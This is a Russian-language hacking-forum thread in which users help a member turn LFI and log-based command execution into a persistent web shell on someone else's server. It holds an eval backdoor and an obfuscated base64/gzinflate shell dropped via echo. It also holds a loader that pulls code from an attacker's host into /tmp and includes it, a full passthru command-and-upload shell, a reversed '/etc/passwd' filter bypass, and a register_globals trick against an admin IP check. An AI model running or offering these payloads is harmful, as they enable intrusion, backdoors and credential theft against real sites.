я так понял что ты залил '<?php eval($_GET[cmd]);?>' да? елси это так то пробуй залить локальный аплоад =)
/cte/=htap_elif;dwssap=eman_elif /cte/ это /etc/ задом на перед =htap_elif; просто чтобы было dwssap это passwd наоборот eman_elif чтобы было другими словами /cte/=htap_elif;dwssap=eman_elif это file_name=passwd;file_path=/etc/ только задом на перед
так ты мне скажи что у тебя вообще щас там есть из твоего что ты залил? P.S если щас речь про <php eval> то ! КАК ТЫ ЗАЛИВАЛ ЭТОТ ЕВАЛ КОД ЧЕРЕЗ into+outfile , точно так же , только вместо <php eval> лей форму локального аплоада!!!
Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда: Code: echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZRkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6vooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnAC4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9fAymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80ySsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsReT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLKPazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQAfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51FhRagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUri0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZvPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bicEE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTdKWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1yun1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96SwbYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1OtFiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOnLWeX7VA718="))); ?>' > shell.php согласен с постом выше, всегда так делал, всегда прокатывало.
Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.
Ппц гуру, где твоя хакерская догадка, откуда он знает что нет качалок, в ssh не работает echo?, в ssh проще уже через ftp клиент подцепить его.
Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10 Есть испольнения комманд и аплоадер файлов.
Выполняю команды через логи. Проверил все мне известные, нифига. Сейчас попробую то, что вы тут насоветывали
твою ж мать =\ Fatal error: Call to undefined function: gzinflate() in А без него разумеется не хочет...
ну праильно, судя по тому, что качалок нет - можно было понять что присутствие gzinflate маловероятно )) лей обычный шелл.
в смысле лить обычный шелл? у меня есть LFI, нашел логи, там выполнял команды... в смысле лить обычный шелл? о_0
Я еще пользовался такой фишкой, когда небыло качалок и удаленных инклудов: Code: <?php if (isset($_GET[p])) { $f=fopen('/tmp/qwerty','w+'); fwrite($f,file_get_contents('http://www.youhost/upl.inc')); } include('/tmp/qwerty'); ?> Надеюсь понятно. залей на хост upl.inc, той что я тебе советол через echo, и етот скрипт через есho бросай на серв, дожно проканать=) В том аплоадере просто хтмл код, нужно было закриптовать.., а так посредствами php можно будет стянуть и проинклудить локально. shell.php?p По теме, пускай буде, если вдруг кому нибудь пригодится. Больше ничем не могу помочь по даному вопросу. upl.inc: Code: <html> <head> <title>uploader</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <style type="text/css"> <!-- body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px} a { color: #000000; text-decoration: none} a:hover { color: #000066; text-decoration: underline} --> </style> </head> <body bgcolor="#999999" text="#000000"> <center> <table width="700" border="0" bgcolor="#000066"> <tr> <td> <table width="100%" border="0" bgcolor="#CCCCCC"> <tr> <td> <p><font size="2"><b><font color="#FF0000"> System: <font color="#000000"> <? passthru("uname -a"); ?> </font><br> Our permissions: <font color="#000000"> <? passthru("id"); ?> </font><br> Our locality: <font color="#000000"> <? passthru("pwd"); ?> </font></font></b></font></p> <pre> <?php // FILE UPLOAD $uploaded = $_FILES['userfile']['tmp_name']; if (file_exists($uploaded)) { $pwd_dir = $_POST['dira']; $real = $_FILES['userfile']['name']; $destination = $pwd_dir."/".$real; copy($uploaded, $destination); echo "Uploaded process:"; print_r ($_FILES); echo "FILE UPLOADED TO $destination"; } else { echo " No file uploaded"; } ?> </pre> <form name="form1" method="post" enctype="multipart/form-data"> <table width="100%" border="0"> <tr> <td width="35%"><font size="2"><b> Browse file to upload:</b></font></td> <td width="65%"> <input type="file" name="userfile" size="45"> </td> </tr> <tr> <td width="35%"><b><font size="2"> Destination:</font></b></td> <td width="65%"> <input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>"> <input type="submit" name="submit2" value="upload"> </td> </tr> <tr> <td width="35%"> <div align="right"> </div> </td> <td width="65%"> </td> </tr> <tr> <td width="35%"><b><font size="2"> Command to execute:</font></b></td> <td width="65%"> <input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>"> <input type="submit" name="submit" value="execute"> </td> </tr> <tr> <td width="35%"> <div align="right"> </div> </td> <td width="65%"> </td> </tr> </table> </form> <p> <pre> <? // command output if ($_POST['cmd']){ $cmd = stripslashes($_POST['cmd']); echo "$cmd executed...<br>"; passthru("$cmd"); } else { echo "No shell command executed"; } ?></pre> <div align="right"> <font size="1"><b>2003 © </b></font> </div> </td> </tr> </table> </td> </tr> </table> </center> </body> </html>
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет... Хулиган, тебя я немного не понял.
Заливай upl.inc на левый хост Через echo заливай етот скрипт Code: <?php if (isset($_GET[p])) { $f=fopen('/tmp/qwerty','w+'); fwrite($f,file_get_contents('http://www.левый-хост/upl.inc')); } include('/tmp/qwerty'); ?> потом shell.php?p
есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip. Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта
Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа PHP: #.... if($_SERVER['REMOTE_ADDR']==$trueip) $welcome=true; else $welcome=false; #.... Не подменить никак... Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP). Повторю, экстрасенсов здесь нет.